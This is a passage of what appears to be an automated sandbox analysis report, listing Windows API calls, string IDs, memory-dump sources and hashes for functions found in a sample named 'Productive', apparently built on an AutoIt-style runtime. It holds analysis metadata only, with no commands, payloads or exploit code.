                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0033C041
                                                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0033C051
                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?,003397E7), ref: 0033C060
                                                                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0033C07D
                                                                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0033C089
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                                                                • API String ID: 1446636887-1154884017
                                                                                                                                                                • Opcode ID: f38e9d2e8d95fd1b435361fff05e2ab48480513b8012d83afd132b209bde8de4
                                                                                                                                                                • Instruction ID: c01f0908aff99ff26f68d22a170e24c79e990abc37987adda6b221ed4e52b45e
                                                                                                                                                                • Opcode Fuzzy Hash: f38e9d2e8d95fd1b435361fff05e2ab48480513b8012d83afd132b209bde8de4
                                                                                                                                                                • Instruction Fuzzy Hash: 6E61B171650215FAEB1ADF64CC85BBA77ACFB08710F108105FA15DA1D1DB74EA90DF60
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B29E2: GetWindowLongW.USER32(?,000000EB), ref: 002B29F3
                                                                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 0033CCCF
                                                                                                                                                                  • Part of subcall function 0033B1A9: ClientToScreen.USER32(?,?), ref: 0033B1D2
                                                                                                                                                                  • Part of subcall function 0033B1A9: GetWindowRect.USER32(?,?), ref: 0033B248
                                                                                                                                                                  • Part of subcall function 0033B1A9: PtInRect.USER32(?,?,0033C6BC), ref: 0033B258
                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0033CD38
                                                                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0033CD43
                                                                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0033CD66
                                                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0033CDAD
                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0033CDC6
                                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0033CDDD
                                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0033CDFF
                                                                                                                                                                • DragFinish.SHELL32(?), ref: 0033CE06
                                                                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0033CEF9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                • API String ID: 221274066-3440237614
                                                                                                                                                                • Opcode ID: 7fd810480ab7dbfc4488f15c2082632e16f7c1d67888afe2f941c6573d2c5620
                                                                                                                                                                • Instruction ID: 0e1ef89168156d90c669e87d5713e58a8ec6914fad493ddd1a79e660a1b1ad88
                                                                                                                                                                • Opcode Fuzzy Hash: 7fd810480ab7dbfc4488f15c2082632e16f7c1d67888afe2f941c6573d2c5620
                                                                                                                                                                • Instruction Fuzzy Hash: 98617D71118301AFC716EF60DC85D9FBBE8EF89350F000A1EF695961A1DB30AA59CF52
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002B2412,?,00000000,?,?,?,?,002B1AA7,00000000,?), ref: 002B1F76
                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002B24AF
                                                                                                                                                                • KillTimer.USER32(-00000001,?,?,?,?,002B1AA7,00000000,?,?,002B1EBE,?,?), ref: 002B254A
                                                                                                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 002EBFE7
                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002B1AA7,00000000,?,?,002B1EBE,?,?), ref: 002EC018
                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002B1AA7,00000000,?,?,002B1EBE,?,?), ref: 002EC02F
                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002B1AA7,00000000,?,?,002B1EBE,?,?), ref: 002EC04B
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 002EC05D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                • String ID: h4
                                                                                                                                                                • API String ID: 641708696-1240665206
                                                                                                                                                                • Opcode ID: b38c54c2dbe6988231169134b556cec14dfd6fc60fa9e8415e1dacae993e9989
                                                                                                                                                                • Instruction ID: 74a033b93ec89c2ee8b1a836639f453f7a6d3affc967e7e54d9235dfb223708a
                                                                                                                                                                • Opcode Fuzzy Hash: b38c54c2dbe6988231169134b556cec14dfd6fc60fa9e8415e1dacae993e9989
                                                                                                                                                                • Instruction Fuzzy Hash: ED61DA30234742EFCB3A9F15C949B6A7BB5FB40352F60852CE04A5A960C770B8B5DF91
                                                                                                                                                                APIs
                                                                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0031AA0E
                                                                                                                                                                • GetDriveTypeW.KERNEL32 ref: 0031AA5B
                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0031AAA3
                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0031AADA
                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0031AB08
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: SendString$BuffCharDriveLowerType
                                                                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                • API String ID: 1600147383-4113822522
                                                                                                                                                                • Opcode ID: 797704389f04b2e61e9a837d47c3a00ed9a149d30bf48d0b3d6f72a08d3eb7c5
                                                                                                                                                                • Instruction ID: 98091e87120be3c80800d3d283c1c7cf2e56174d3fb94e2604736ee686131aae
                                                                                                                                                                • Opcode Fuzzy Hash: 797704389f04b2e61e9a837d47c3a00ed9a149d30bf48d0b3d6f72a08d3eb7c5
                                                                                                                                                                • Instruction Fuzzy Hash: 6D516A711142059FC305EF10C882DAAB7F8FF99358F108A2DF89697262DB31AE55CF92
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0033982C,?,?), ref: 0033C0C8
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0033982C,?,?,00000000,?), ref: 0033C0DF
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0033982C,?,?,00000000,?), ref: 0033C0EA
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0033982C,?,?,00000000,?), ref: 0033C0F7
                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0033C100
                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0033982C,?,?,00000000,?), ref: 0033C10F
                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0033C118
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0033982C,?,?,00000000,?), ref: 0033C11F
                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0033982C,?,?,00000000,?), ref: 0033C130
                                                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00343C7C,?), ref: 0033C149
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0033C159
                                                                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 0033C17D
                                                                                                                                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0033C1A8
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0033C1D0
                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0033C1E6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3840717409-0
                                                                                                                                                                • Opcode ID: 493a34068edb3e2b2cd7729509d5d638a1c9f3041b34bd87463fdba24202d342
                                                                                                                                                                • Instruction ID: d125dd3c600e6674244404bc52424b667f77a318fdf90a0b7e9b6ff944d02bd8
                                                                                                                                                                • Opcode Fuzzy Hash: 493a34068edb3e2b2cd7729509d5d638a1c9f3041b34bd87463fdba24202d342
                                                                                                                                                                • Instruction Fuzzy Hash: FB412F79600204EFDB169F65DC8CEAA7BBCEF4A711F104458FA05EB250DB70AD41DB60
                                                                                                                                                                APIs
                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0031831A
                                                                                                                                                                • VariantCopy.OLEAUT32(00000000,?), ref: 00318323
                                                                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 0031832F
                                                                                                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0031841D
                                                                                                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 00318479
                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0031852A
                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 003185BE
                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00318618
                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00318627
                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 00318665
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                • API String ID: 1234038744-3931177956
                                                                                                                                                                • Opcode ID: ac04a6e29fd0f6271b823aac1dfbc260f0f9df751cbb4e634c9dd5f8d25457af
                                                                                                                                                                • Instruction ID: 9fa04f6a7482bd4947983704b85119af3286b92db0120f7f19670670236b2f4d
                                                                                                                                                                • Opcode Fuzzy Hash: ac04a6e29fd0f6271b823aac1dfbc260f0f9df751cbb4e634c9dd5f8d25457af
                                                                                                                                                                • Instruction Fuzzy Hash: B3D10339604115DBCB2A9F61C884BEEF7B8FF09700F288959E5159B691CF30EC90DBA4
                                                                                                                                                                APIs
                                                                                                                                                                • GetDC.USER32(00000000), ref: 00327A79
                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00327A85
                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00327A91
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00327A9E
                                                                                                                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00327AF2
                                                                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00327B2E
                                                                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00327B52
                                                                                                                                                                • SelectObject.GDI32(00000006,?), ref: 00327B5A
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00327B63
                                                                                                                                                                • DeleteDC.GDI32(00000006), ref: 00327B6A
                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00327B75
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                • String ID: (
                                                                                                                                                                • API String ID: 2598888154-3887548279
                                                                                                                                                                • Opcode ID: db6af30c4f72a2c04c2307eceb741a7a833074f23b331f71ba957ed9cfb48c1a
                                                                                                                                                                • Instruction ID: 47e87148897fb997bfaca946d796de7249f298b14a9fae3bac5306c807483116
                                                                                                                                                                • Opcode Fuzzy Hash: db6af30c4f72a2c04c2307eceb741a7a833074f23b331f71ba957ed9cfb48c1a
                                                                                                                                                                • Instruction Fuzzy Hash: 06514C75A04219EFCB15CFA8DC85EAEBBB9FF49310F14841DFA4AA7310D731A9418B50
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00308E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00308E3C
                                                                                                                                                                  • Part of subcall function 00308E20: GetLastError.KERNEL32(?,00308900,?,?,?), ref: 00308E46
                                                                                                                                                                  • Part of subcall function 00308E20: GetProcessHeap.KERNEL32(00000008,?,?,00308900,?,?,?), ref: 00308E55
                                                                                                                                                                  • Part of subcall function 00308E20: HeapAlloc.KERNEL32(00000000,?,00308900,?,?,?), ref: 00308E5C
                                                                                                                                                                  • Part of subcall function 00308E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00308E73
                                                                                                                                                                  • Part of subcall function 00308EBD: GetProcessHeap.KERNEL32(00000008,00308916,00000000,00000000,?,00308916,?), ref: 00308EC9
                                                                                                                                                                  • Part of subcall function 00308EBD: HeapAlloc.KERNEL32(00000000,?,00308916,?), ref: 00308ED0
                                                                                                                                                                  • Part of subcall function 00308EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00308916,?), ref: 00308EE1
                                                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00308B2E
                                                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00308B62
                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00308B73
                                                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00308BB0
                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00308BCC
                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00308BE9
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00308BF8
                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00308BFF
                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00308C20
                                                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00308C27
                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00308C58
                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00308C7E
                                                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00308C92
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1795222879-0
                                                                                                                                                                • Opcode ID: f1e4beb976fc4e49d65780bfd4592c0fac9f37808f447b4468543f99a43f53e5
                                                                                                                                                                • Instruction ID: b0fa18f95e3e0fc0d5beccfc1677f4a3dc0677d2203af4afb176cb825afe4321
                                                                                                                                                                • Opcode Fuzzy Hash: f1e4beb976fc4e49d65780bfd4592c0fac9f37808f447b4468543f99a43f53e5
                                                                                                                                                                • Instruction Fuzzy Hash: 1D617C75A01209EFDF16DF90DC54EEEBB79FF05300F048169EA95AB290DB309A01CB60
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B29E2: GetWindowLongW.USER32(?,000000EB), ref: 002B29F3
                                                                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0033C8A4
                                                                                                                                                                • GetFocus.USER32 ref: 0033C8B4
                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 0033C8BF
                                                                                                                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0033CA15
                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 0033CA35
                                                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0033CA48
                                                                                                                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0033CA7C
                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0033CAC4
                                                                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0033CAFC
                                                                                                                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0033CB31
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 1026556194-4108050209
                                                                                                                                                                • Opcode ID: ff5fdd2463291b54170bd6c380bbd5f2832e7a8c93d5736d3f1ead5b6cdba689
                                                                                                                                                                • Instruction ID: ca9cd0e23bde932d8722d5f612a5798aaf2b0c36772b689d613e49657e82e87a
                                                                                                                                                                • Opcode Fuzzy Hash: ff5fdd2463291b54170bd6c380bbd5f2832e7a8c93d5736d3f1ead5b6cdba689
                                                                                                                                                                • Instruction Fuzzy Hash: 8D818C75218305AFD716CF14C8C5A6ABBE8FB89350F01491DF999A7291CB70E905CFA2
                                                                                                                                                                APIs
                                                                                                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0033040D,?,?), ref: 00331491
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BuffCharUpper
                                                                                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                • API String ID: 3964851224-909552448
                                                                                                                                                                • Opcode ID: f871c36618d72eb76cf7bf93f6ca5a4f9b897a1bf58393955ac2c262672d5423
                                                                                                                                                                • Instruction ID: 520b32969190742ca2b9c1eddc76295ce7b81ae9c77fb66b967f1c217a8d415f
                                                                                                                                                                • Opcode Fuzzy Hash: f871c36618d72eb76cf7bf93f6ca5a4f9b897a1bf58393955ac2c262672d5423
                                                                                                                                                                • Instruction Fuzzy Hash: 53416E3452025ACBDF12EF50D891AEA3725FF66304F518416FC92572A6DB30ED29CF61
                                                                                                                                                                APIs
                                                                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003158EB
                                                                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00315901
                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00315912
                                                                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00315924
                                                                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00315935
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: SendString
                                                                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                • API String ID: 890592661-1007645807
                                                                                                                                                                • Opcode ID: a36a1d6735dc2ab49396fba07d32b1e5f07c358def1afaae9a3950e654872375
                                                                                                                                                                • Instruction ID: 34d0f7c5bd586a5d07e847946e867d766f3a1b47a1714258078f9af3b67b2f3c
